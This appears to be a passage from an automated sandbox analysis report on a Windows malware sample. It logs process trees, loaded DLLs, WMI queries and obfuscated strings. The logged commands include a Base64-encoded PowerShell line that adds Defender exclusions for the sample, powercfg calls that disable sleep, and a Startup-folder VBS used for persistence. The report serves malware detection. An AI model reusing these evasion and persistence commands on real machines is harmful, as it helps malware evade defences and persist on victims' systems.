                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ZppxPm0ASs.exeReversingLabs: Detection: 28%
                  Source: RegAsm.exeString found in binary or memory: VTN6Nh5XbzscSXblTyZngwFcev0EQ2FSYT5k/AddbisDSnrOTShvMQJJdg4AWWffUyN6FgZDYQYeQWSoSiJuEQZKetgEV29TVDB20QZZZ0cbXHqZSTxhTh9BZOUCXW5hVTN64gVXb4YGSXYpWyBnnxtcersCQ2GyVz5koAFdbqcESnpWVy5vswVJdikFWWdnUCN6MQNDYdwdQWR8SSJuzQVKeg8IV2+nWzZ2DQpZZ5MWXHqNRTphmhJBZFMOXW5JVTN6
                  Source: RegAsm.exeString found in binary or memory: HAp7ShKLOm3GmM5+zgyhWcs5sL7enZpOudi73Bvejn9MSku740QYz/lLEE6/LoadizmKjORZiH/b6YQkZAy+DUwKeOVBmsk/CxGOfe5Dmg47S5TmGo+5HeYWm9uJ/MwTDjkmR59LOc1Tib0sg18JvklX4BjMvtskVFnbybmO0E89Z4SZTrvLjcm67EGfzLnMTSEezv3c11Xamcn5y4qOfGPFWki+SYkP+uuBXQx8y8oj2Yj+hMuIfeVE2Am5DghPPWhE
                  Source: RegAsm.exeString found in binary or memory: jvE4d4BH846iOq8cTEdG5ujDZBH54Ea+Q2nzL7JLKC7vSRkPMpVDRZA5IGa+cqmib8P7mSGuubkOIrXjrkLk4X5Kkm8SpUOeoVQjvvF0cj5RJKMPGNMTsuNS65uiknOTE4Lzs7JzUnKevGVpSXiJEm8J5pf25wLORunGtsaTpZoyfn6np1dHAp7e8CYGx3K12VPvAeSiAt5LM38hJNEiLsnSrnHlUMPOqfLvoB7DPmC/k6/LoadWt/a5hqMlBX4Dgjbh
                  Source: RegAsm.exeString found in binary or memory: 0RTz/lL2E6/LoadZu/I/iiPuK5IuSrNi4lMCoxPDk0KY0YvJGROfsVXj487QtPO5JTCXBqK+SOJ/+xAX/ZsmFyZCn6KkowmxB4bnAtDCx3M/sGYiMEGGYneZk8+6zv7lb0bHduK0Ky8qyGG1qSlDvz8k3qamdvJuq6fvBXY2ZqOulgWStdsfmvkiJOmZAj+v5SyXJqZyfrr3X1fHJhZud2UilEriYSuvKsJnOph0NNh4kh++5Dx25vejn/uCnjqn3gjX
                  Source: RegAsm.exeString found in binary or memory: CAp7wZWPCT+GkoROvAGSlAp6p0HQj/iXCLsooaBwI6LQ57tmvm76bcQTX5tOXrloyzkppt8y5aNI+y4JuRyma/pZWbvshBCiK1Vrw6YxZGPm5Aj+A5SCfmtL+QSS1o5/xxFPiL5OEgnJu21WjglLy4lMiovuT/ifIL21ZGQQbIKZSjtZPm3hMTSkY46/LoadizkO3uRdSH5vSrqihp++k6b0SPvnxrHNuMzjjvytldqayFxO/EkYT4JpIeBfW1xPBOiJ
                  Source: RegAsm.exeString found in binary or memory: n5vzLtDnx/GXAy/W8z4GNrLOc+TCQxnqAjjaMliKon8o19devLZG9rP/GFJf9X3mEtbzLySblvJWpiKGM0U8d/MXkyV23WYShzDGkrfdQzWj4j8XTXfiJmI/mrhDS8SXE6/LoadS1ErJh+Puq6lSXnKloqOIu2KOWUdhjD/Ts/+7i5k2rwhWzhNiq2iXBor+cjJ/A8JvqgpoJwQGO3jGpzsPE/J7CFaWk+Kf4kOCbsnCbkLXk4/SQuJ3GiJEw5fgV5OP
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile read: C:\Users\user\Desktop\ZppxPm0ASs.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\ZppxPm0ASs.exe "C:\Users\user\Desktop\ZppxPm0ASs.exe"
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe explorer.exe
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsStopped.exe "C:\Users\user\AppData\Roaming\IsStopped.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsStopped.exe "C:\Users\user\AppData\Roaming\IsStopped.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
